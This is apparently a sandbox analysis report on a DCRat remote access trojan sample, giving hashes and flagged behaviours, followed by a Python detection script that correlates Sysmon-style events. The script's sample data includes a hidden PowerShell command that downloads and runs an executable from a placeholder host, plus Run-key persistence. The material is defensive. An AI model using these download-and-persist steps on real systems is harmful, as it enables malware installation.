General

  • Target

    test.exe

  • Size

    154KB

  • Sample

    240622-rsp7ws1fpg

  • MD5

    888cffc8e5f72b2a4ea416b028af87c9

  • SHA1

    eb520fc0c91d329f98568452fff0dd985c37556a

  • SHA256

    3d0ddd3c8dccf9b68e2fb3d751e555f2b92e84d89d04caaf6b819439e8147431

  • SHA512

    365ffd1a32cc7ae193bf298d79af35ef2c5e567630e34783b490902fd744f24a43a1fa0f5d89f18f96d88ec23eef30aaab363d9563fb91bf316264ee02bcf89e

  • SSDEEP

    3072:uahKyd2n31J5GWp1icKAArDZz4N9GhbkrNEk1hT:uahOlp0yN90QEq

Malware Config

Targets

    • Target

      test.exe

    • DcRat

      DarkCrystal (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • DCRat payload

      Detects payload of DCRat, commonly dropped by NSIS installers.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest used as a download cradle.

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up the country code configured in the registry, likely for geofencing.

    • Executes dropped EXE

    • Adds Run key to start application
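
The behaviours flagged above (an unexpected child process, a PowerShell Invoke-WebRequest download, execution of the dropped EXE, and a Run key for persistence) chain together into a detection that can be run over endpoint telemetry. The following is an added example, not part of the sandbox report or of any vendor signature: it correlates constructed Sysmon-style events (IDs 1, 11 and 13; the field names, paths and the allowlist of parents that legitimately spawn shells are assumptions) and returns one finding per matched behaviour.

```python
import re

# Sysmon-style event records constructed for this example; not from the sandbox run.
# Field layout (id/image/parent/cmdline/target/details) is an assumption.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROP = r"C:\Users\u\AppData\Local\Temp\upd.exe"
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Users\u\Desktop\test.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "test.exe"},
    {"id": 1, "image": PS, "parent": r"C:\Users\u\Desktop\test.exe",
     "cmdline": "powershell -nop -w hidden Invoke-WebRequest http://example.invalid/upd.exe -OutFile " + DROP},
    {"id": 11, "image": PS, "target": DROP},                       # file created by powershell
    {"id": 1, "image": DROP, "parent": PS, "cmdline": "upd.exe"},  # dropped file executed
    {"id": 13, "image": DROP,
     "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\updater",
     "details": DROP},
]

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
# Parents that normally launch shells; any other parent is treated as unexpected (assumption).
EXPECTED_SHELL_PARENTS = ("explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                          "services.exe", "svchost.exe")
# Invoke-WebRequest plus its PowerShell aliases and the WebClient equivalents.
CRADLE_RE = re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring|net\.webclient", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
PE_EXT = (".exe", ".dll", ".scr")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return findings in event order; dropped-file execution is correlated
    against earlier file-create events by full path."""
    findings = []
    dropped = {}  # lower-cased path -> index of the event that created it
    for i, ev in enumerate(events):
        eid = ev["id"]
        if eid == 1:  # process creation
            img, parent = basename(ev["image"]), basename(ev["parent"])
            if img in SHELLS and parent not in EXPECTED_SHELL_PARENTS:
                findings.append({"rule": "unexpected_child_process", "event": i,
                                 "parent": parent, "child": img})
            if img in SHELLS and CRADLE_RE.search(ev["cmdline"]):
                findings.append({"rule": "powershell_download_cradle", "event": i})
            path = ev["image"].lower()
            if path in dropped:
                findings.append({"rule": "dropped_exe_executed", "event": i,
                                 "created_by_event": dropped[path]})
        elif eid == 11:  # file creation
            if ev["target"].lower().endswith(PE_EXT):
                dropped[ev["target"].lower()] = i
        elif eid == 13:  # registry value set
            if RUN_KEY_RE.search(ev["target"]):
                findings.append({"rule": "run_key_persistence", "event": i,
                                 "value": ev.get("details")})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The geofence check (a registry read of the configured country code) is deliberately not in this rule set: registry reads do not produce Sysmon events, so it is visible in a sandbox API trace such as this report but not in ordinary endpoint logs. Correlating the file-create path with the later process-create image is what turns "Downloads MZ/PE file" and "Executes dropped EXE" into a single higher-confidence finding rather than two weak ones.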

MITRE ATT&CK Enterprise v15

Tasks